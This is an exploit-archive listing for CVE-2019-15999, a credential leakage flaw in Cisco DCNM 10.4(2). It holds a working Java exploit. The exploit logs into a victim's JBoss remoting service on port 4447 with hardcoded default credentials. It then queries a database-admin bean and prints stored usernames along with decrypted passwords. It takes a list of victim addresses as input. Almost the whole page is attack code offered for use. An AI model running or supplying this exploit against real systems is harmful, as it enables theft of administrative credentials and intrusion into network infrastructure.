Cisco DCNM JBoss 10.4 Credential Leakage

Cisco DCNM JBoss version 10.4 suffers from a credential leakage vulnerability.


MD5 | f2b2bc3ee27fbddf61de2d091386e2bd

# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
# Date: 2020-01-06
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
# Version: 10.4(2)
# CVE: CVE-2019-15999

# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/dcnm_expl/Main.java

# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]

package com.whatdidibreak.dcnm_expl;

import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
import com.cisco.dcbu.jaxws.wo.DBRowDO;
import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;

import java.util.Properties;

import javax.naming.Context;
import javax.naming.InitialContext;

public class Main {

public static void main(String[] args) throws Throwable {
for (String target : args) {
System.out.println("Target: " + target);

Properties jndiProps = new Properties();
jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
jndiProps.put("jboss.naming.client.ejb.context", true);

Context ctx = new InitialContext(jndiProps);

DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");

for (DBRowDO row : i.getServerProperties(null).getRows()) {
String propName = row.getEntry()[0];
String propValue = row.getEntry()[1];

if (propValue.isEmpty()) {
continue;
}

if (propName.contains("user")) {
System.out.println(propName + " = " + propValue);
} else if (propName.contains("pass")) {
System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
}
}

System.out.println();
}
}
}

Related Posts